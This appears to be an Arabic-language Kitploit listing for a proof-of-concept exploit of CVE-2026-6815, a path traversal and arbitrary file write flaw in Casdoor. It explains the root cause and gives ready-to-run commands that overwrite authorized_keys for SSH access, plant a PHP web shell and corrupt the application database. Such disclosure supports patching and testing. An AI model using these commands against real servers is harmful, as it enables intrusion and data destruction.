Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-6815 — إثبات مفهوم مصادق عليه لثغرة اجتياز المسار وكتابة ملفات عشوائية في Casdoor <3.54.1، مما يتيح RCE عبر حقن مفتاح SSH، أو رفع شل ويب، أو DoS مستمر عبر إتلاف قاعدة البيانات. | Kitploit
أدوات/GitHubGitHub/danilo-dellorco/cve-2026-6815
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubdanilo-dellorco/cve-2026-6815

CVE-2026-6815

إثبات مفهوم مصادق عليه لثغرة اجتياز المسار وكتابة ملفات عشوائية في Casdoor <3.54.1، مما يتيح RCE عبر حقن مفتاح SSH، أو رفع شل ويب، أو DoS مستمر عبر إتلاف قاعدة البيانات.

عرض المستودع
22منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-6815 إثبات المفهوم/استغلال: Casdoor <3.54.1 اجتياز المسار وكتابة ملف عشوائي (مصادق عليه)

يحتوي هذا المستودع على استغلال إثبات المفهوم (PoC) لـ CVE-2026-6815، وهو ثغرة كتابة ملف عشوائي واجتياز المسار في Casdoor.

تم إصلاح الثغرة في الإصدار 3.54.1.

المتطلبات

يجب أن يكون المهاجم مصادقًا عليه في مثيل Casdoor بصلاحيات مدير أو مستخدم مكافئ لديه صلاحية إنشاء و/أو تعديل موفري التخزين.

التأثير

  • تنفيذ التعليمات البرمجية عن بُعد (RCE): عن طريق الكتابة في مواقع حساسة مثل .ssh/authorized_keys، أو crontabs، أو webroots.
  • رفض الخدمة (DoS): استبدال قواعد بيانات التطبيق (casdoor.db) أو الملفات الثنائية الأساسية بملفات عشوائية تؤدي إلى إيقاف التطبيق فورًا.

التفاصيل التقنية

يسمح Casdoor للمدراء بتكوين موفري التخزين. يفشل موفر نظام الملفات المحلي (Local File System) في تعقيم تكوين pathPrefix ومعلمة fullFilePath بشكل صحيح أثناء تحميل الموارد.

باستخدام تسلسلات اجتياز الدليل (../)، يمكن للمدير المصادق عليه الخروج من دليل التخزين المخصص وكتابة الملفات في أي مكان يملك فيه عملية Casdoor الصلاحيات.

تنبع الثغرة من عدم كفاية التحقق من المسار في:

  • object/provider.go: لا يوجد تحقق من pathPrefix أثناء الإنشاء/التحديث.
  • storage/local_file_system.go: لا تتحقق طريقة GetFullPath مما إذا كان المسار الذي تم حله يظل ضمن الصندوق الرملي المقصود.

الاستخدام

  1. تثبيت التبعيات:

    root@kitploit:~
    pip install -r requirements.txt
    
  2. تشغيل الاستغلال:

    root@kitploit:~
    python3 poc.py --url http://target:8000 --file local_file --rpath /home/casdoor/new_remote_file
    

أمثلة الاستخدام

1. حقن مفتاح SSH لتنفيذ التعليمات البرمجية عن بُعد (RCE)

كتابة مفتاح عام يتحكم فيه المهاجم إلى ملف authorized_keys لمستخدم casdoor للحصول على وصول SSH.

إنشاء مفتاح SSH:

root@kitploit:~
ssh-keygen -f casdoor_rce

استبدال authorized_keys بالمفتاح العام المُنشأ:

root@kitploit:~
python3 poc.py --url http://target:8000 --usr admin --psw 123 --file casdoor_rce.pub --rpath /home/casdoor/.ssh/authorized_keys

الحصول على شل SSH على المضيف البعيد باستخدام المفتاح الخاص:

root@kitploit:~
ssh -i ./casdoor_rce casdoor@target

2. رفض الخدمة المستمر (إتلاف قاعدة البيانات)

استبدال ملف قاعدة البيانات المحلية للتطبيق (مثل casdoor.db) للتسبب في رفض الخدمة.

root@kitploit:~
python3 poc.py --url http://target:8000 --usr admin --psw 123 --file dummy.txt --rpath /app/casdoor.db

3. تحميل شل ويب (جذر ويب ثانوي)

إذا كان الخادم يستضيف خادم ويب ثانوي (مثل Apache/Nginx) على نفس نظام الملفات، فاكتب شل ويب في جذر المستندات الخاص به.

root@kitploit:~
python3 poc.py --url http://target:8000 --usr admin --psw 123 --file shell.php --rpath /var/www/html/shell.php

4. مؤسسة وتطبيق مخصصان

إذا كانت لديك بيانات اعتماد إدارية لمؤسسة وتطبيق محددين (بخلاف الافتراضيين built-in و app-built-in)، فحددهم باستخدام --orgname و --appname.

root@kitploit:~
python3 poc.py --url http://target:8000 --usr custom_admin --psw P@ssw0rd --orgname my-org --appname my-app --file local_file.txt --rpath /tmp/pwned.txt

المراجع

  • ملاحظة الثغرة VU#937808 من CERT/CC
  • CVE-2026-6815 على CVE.org
  • استشارة الأمان من Red Hat: CVE-2026-6815

إخلاء مسؤولية

هذا البرنامج مخصص للأغراض التعليمية واختبار الأمان المصرح به فقط. المؤلف غير مسؤول عن أي سوء استخدام لهذه المعلومات.

المؤلف

تم اكتشاف الثغرة وتطوير إثبات المفهوم بواسطة Danilo Dell'Orco (sixpain).

تنزيل الأداة